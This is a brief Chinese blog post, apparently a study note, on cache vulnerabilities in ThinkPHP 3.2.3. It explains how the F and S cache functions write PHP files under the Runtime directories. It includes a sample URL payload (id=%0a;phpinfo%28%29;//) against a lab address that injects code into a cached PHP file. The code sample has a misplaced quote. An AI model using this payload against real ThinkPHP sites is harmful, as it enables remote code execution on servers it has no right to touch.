缓存漏洞

一、F方法

当用F方法时，访问该页面会在Applica/Runtime/Data下生成一个key.php,

    public function index(){
		F('key','<?php phpinfo()?>)';
    }

当用S方法时，访问该页面会在Applica/Runtime/Temp目录下生成一个文件，其中文件名为a，被md5加密

//访问页面，exp为id=%0a;phpinfo%28%29;//
http://192.168.214.130/thinkphp_3.2.3/index.php/home/index/index?id=%0a;phpinfo%28%29;//

posted @ 2020-12-10 16:18 lnterpreter 阅读(122) 评论(0) 编辑收藏举报

刷新页面返回顶部